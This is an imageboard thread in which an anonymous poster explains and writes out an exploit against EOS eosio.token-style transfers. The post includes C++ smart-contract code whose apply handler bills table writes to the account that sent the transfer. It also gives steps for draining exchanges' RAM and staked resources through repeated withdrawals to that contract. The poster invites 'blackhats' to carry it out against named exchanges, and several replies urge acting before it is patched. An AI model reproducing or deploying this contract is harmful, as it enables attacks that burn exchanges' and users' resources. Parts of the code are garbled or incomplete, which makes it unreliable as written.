DISCLAIMER: This is for educational purposes only. I am not responsible for anything that you choose to do with this information. I strongly recommend that you do not deploy a contract like this.
the eosio.token in EOS has an exploit where you can take user's ram and steal their resources. Exploit was discovered a little while ago but I just checked, and a tonne of exchanges (including binance) and dapps are still vulnerable to it.
im not going to do the exploit myself in case the feds catch me or some shit lol, but ill explain how it works, so if any other devs or blackhats want to have some fun and do it yourself, be my guest ;). Granted, you will probably have to be a little familiar with how eos smart contracts and the eos API works.
in a smart contract, there is an event listener function called "apply", it listens to any incoming events on the contract and then executes a handler. inside the handler you can reference other functions in your contract.
here is the apply function: extern "C" { /// The apply method implements the dispatch of events to this contract void apply( uint64_t receiver, uint64_t code, uint64_t action ) { if(action == N(transfer)) { //Here we make sure that the action is a `transfer` action from any contract that is or follows eosio.token standard //Here is the handler for the event where we can put our exploit function exploit_function(reciever); } } }
before we go any further we have to include the currency.hpp file so that we can get a reference to the `transfer` struct and then get person who sent the action (it'll be more clear why we need this in a minute): #include //This uses `currency` as a namespace.
okay now we have all of the user's permissions that let us write data on his/her behalf. Now we can have some fun.
lets define a table struct and a multi_index table so that you can store data that the user has given us permissions to do on behalf of them kek. struct exploit_table { uint64_t a; uint64_t b; uint64_t c; uint64_t d; } typedef eosio::multi_index< N(exploittable), exploit_table > exploittable; //Multi_index table (name of the table cant have any snake_case or camelCase in it)
here is an example of an exploit function: //We pass in `reciever` from the `apply` function which is a reference to our malicious contract void exploit_function(self) { auto data = unpack_action_data(); //Unpacking the transfer struct from the currency namespace that we got from icluding currency.hpp account_name person_we_are_going_to_pwn = data.from; exploittable get_rekt_scrub(self, self); //Initialise the table scoped to `self, self` (it doesnt matter really as long as the first parameter is `self`) for(uint i = 0; i < 100; ++i) { //(make sure this for loop isnt too big or the action will through an error). Instead you can just call it multiple times. get_rekt_scrub.emplace(person_we_are_going_to_pwn,[&](auto& table_ref){ table_ref.a = 100; table_ref.b = 100; table_ref.c = 100; table_ref.d = 100; }); } }
Now you can make a Eos withdraw from an exchange or app to this contract. Everytime an exchange sends you their EOS, you will eat up their RAM. Make multiple withdraws and their resources will be drained. “””IF”””” Someone did this, they would basically burn all of the exchanges staked EOS. Which is probably millions of EOS or $10’s or even $100’s of millions worth of EOS that gets destroyed and never returned… Literally the DAO 2.0
Juan Diaz
heh code came out shit. Here is a picture of a full contract so you can read it better.
wew lad. I literally showed you how you can destroy the eos network and burn all of the exchanges EOS funds and get no replies.
Meanwhile, threads like "tulip mania 2.0" get hundreds. fuck you biz. im out. Enjoy your bags.
Youll also need to define the types and actions in an ABI file but I cba to write one out, but here is the documentation for it: developers.eos.io
Connor Ross
who are you talking to?
Zachary Gutierrez
Very few people here on biz program, even fewer have experience with coding smart contracts, and almost no one here ever tried the EOS ones. So most don't even know how to start with the info you gave, and the fews who do are would try right away instead of replying. But I do know the info is legit. Thanks for sharing.
Noah Brooks
Non programmer here. Is this legit? Are we going to witness EOS implode?
So is it fixed or are hackers going to take advantage of the exploit? I don’t have any EOS just curious
Noah Miller
huh, it's sort of like the DAO reentrancy bug, except worse, because it appears to be unpatchable without fundamentally changing how EOS works.
Ayden Davis
this, people who get it are probably working on it, the rest has no fucking clue what the fuck you just said.
Adrian Young
Because I'm looking at it. There aren't that many devs on Jow Forums. I'm considering what to do with this.
Josiah Jackson
there's no eos on shapeshift. Buying it anonymously seems hard, and other people are probably way ahead of me in trying to exploit it. I hope it hurts binance and other exchanges and leads to delisting of eos
It will take a few hours or so for it to spread within the community. When the ICON exploit was found, it took probably 3 hours or so
Levi Scott
the icon exploit was a big nothing, it was only irritating
Landon Stewart
because no one has done it yet..
If your going to do it, you should probably do it soon btw. People are talking about it now. Only a matter of time before exchanges get the word and disable withdrawals/implement a proxy contract so it no longer effects them.
Caleb Long
>bullshit Nigga, the dev team acknowledged it. It's just that, from what I got, it drains the EOS from the target, but the attacker doesn't get it, so incentive is low.
i didnt really explain this either but basically you have to deploy the contract. then make a withdrawal from the exchange to the smart contract and their staked eos and resources get used up/burned.
Brandon Bell
from what I understand even if this works the only thing you could do with this is use up someone's available RAM, you wouldn't actually impact their token balance or anything
Samuel Adams
No the scatter guy acknowledged it and he is a fucking weirdo.
i mean it killed ICON though, so you can't call it nothing.
Lucas Lee
Holy shit fucking post in here. This board is busy promoting lifestyle posts when we could be witnessing a legitimately critical moment for EOS. I don’t hold any but this seems legit
Andrew Perez
Guarantee nothing comes of this.
Michael Thomas
possible, if you own eos you are already ok with emergency freezes, account lockdowns and editing. If the exploit ends up getting used BPs are only going to edit the changes back.
How did crypto even end up in that state.
William Ward
you can steal someone's ram. I don't know eos enough to know if that ram can be sold then.
Mason Lee
I don't think it "steals" their RAM it just uses up their available resources like a DDoS or something
Chase Hernandez
Well EOS is a shit coin so whatever
Lincoln Allen
Bump. Want to see Pajeets get rekt
Levi Gomez
nobody knows if you can sell it or not, because nobody understands eos.
Hudson Morales
Can someone tell me what the fuck is EOS?
Carson Watson
Have you been living under a rock?
Joseph Garcia
This is my first time ever visiting Jow Forums and I saw this thread on the front page so yes. I’m just gonna google everything said in this thread that I don’t know about
Benjamin Green
fucking love that this shit is still referenced
Carson Brooks
Whats the point if you can't receive the coins. It's not theft, just vandalism.
